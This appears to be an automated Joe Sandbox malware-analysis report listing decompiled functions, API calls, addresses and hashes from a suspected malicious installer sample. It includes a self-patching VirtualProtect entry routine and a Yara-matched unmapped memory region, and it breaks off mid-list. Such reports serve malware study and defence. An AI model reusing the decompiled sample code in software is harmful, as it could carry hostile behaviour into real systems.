Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 02B62386 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02B623B2

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: dfbd171a05564454edc1b1081ded02cc2bfdfd173a462cff48ed113e1be42bb3
Instruction ID: 46de944ba099bec42195a3cc0c4fe91cca84dffd80c1a11bb3691d061ae26e22
Opcode Fuzzy Hash: dfbd171a05564454edc1b1081ded02cc2bfdfd173a462cff48ed113e1be42bb3
Instruction Fuzzy Hash: C54189351492888FEB1A8A2498493F97BE1EF63220B1C94DDCD955BA57C3290E07C745

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C37(0xffffffd0);
				_t16 = E00402C37(0xffffffdf);
				E00402C37(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004065C5(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00406048(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x00402885
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x00402245
0x00402245
0x00402245
0x00402ac2
0x00402ace

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 74186f494bda1ab46af0e2e44738d7a84c9d2225f1465ff36fedc9be1cd50fa6
Instruction ID: a1293fda71315ca4f457bf12d72103a8cc789f689a624f6d3393c8ddcf995e9b
Opcode Fuzzy Hash: 74186f494bda1ab46af0e2e44738d7a84c9d2225f1465ff36fedc9be1cd50fa6
Instruction Fuzzy Hash: 06F0B431608114A7DB20B7B54F0DE9F61A48F92378F25073FB011B21D1EABC8911956F

Uniqueness

Uniqueness Score: -1.00%

Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061E2(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004061C9();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027e9
0x004027e9
0x004027ea
0x004027f2
0x004027f7
0x004027f8
0x00402807
0x00402810
0x00402a61
0x00402a62
0x00402a65
0x00402a65
0x00402810
0x00402ac2
0x00402ace

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807

Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402306
0x00402306
0x00402308
0x0040230c
0x0040230f
0x00402314
0x00402319
0x00402322
0x00402322
0x00402327
0x00402330
0x00402330
0x0040233d
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D

Uniqueness

Uniqueness Score: -1.00%

Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040611D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406074(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406127
0x00406130
0x00406146
0x00000000
0x00406146
0x00406134
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679

Uniqueness

Uniqueness Score: -1.00%

Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E26(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e2a
0x00405e3a
0x00405e42
0x00000000
0x00405e49
0x00000000
0x00405e4b

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DF7(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dfb
0x00405e0b
0x00405e13
0x00000000
0x00405e1a
0x00000000
0x00405e1c

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8

Uniqueness

Uniqueness Score: -1.00%

Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027cb
0x100027d0
0x100027e0
0x100027e8
0x100027ef
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x1000280d
0x10002815

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19

Uniqueness

Uniqueness Score: -1.00%

Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060EF(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406074(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004060f9
0x00406100
0x00406113
0x00000000
0x00406113
0x00406104
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617D,?,00000000,?,?,Call,?), ref: 00406113

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2fa47fe085563f489a8d9053a88f487a873bc99eba6c78938d0479edac3a7faf
Instruction ID: 18b2471a241adc9bf36c7ea4c0146ff71e49c13b27122dc007abb7967bce33ea
Opcode Fuzzy Hash: 2fa47fe085563f489a8d9053a88f487a873bc99eba6c78938d0479edac3a7faf
Instruction Fuzzy Hash: ECD01272B04104DBDB11DBA4AF0859D72A59B50364B214577E101F11D1DAB989449A19

Uniqueness

Uniqueness Score: -1.00%

Function 00404263 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404263(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433eb8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404263
0x0040426a
0x00404275
0x00000000
0x00404275
0x0040427b

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
Instruction ID: 095d2356c3d82f38ec3eb680651803a72dc2fc2a091610a0eb944f64c2fac8e0
Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
Instruction Fuzzy Hash: 5CC09B717443007BDE118F609D85F0777546790741F14447D7344F51E0C774E450D61C

Uniqueness

Uniqueness Score: -1.00%

Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040424C(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434ee8, 0x28, _a4, 1); // executed
				return _t2;
			}

0x0040425a
0x00404260

APIs

SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
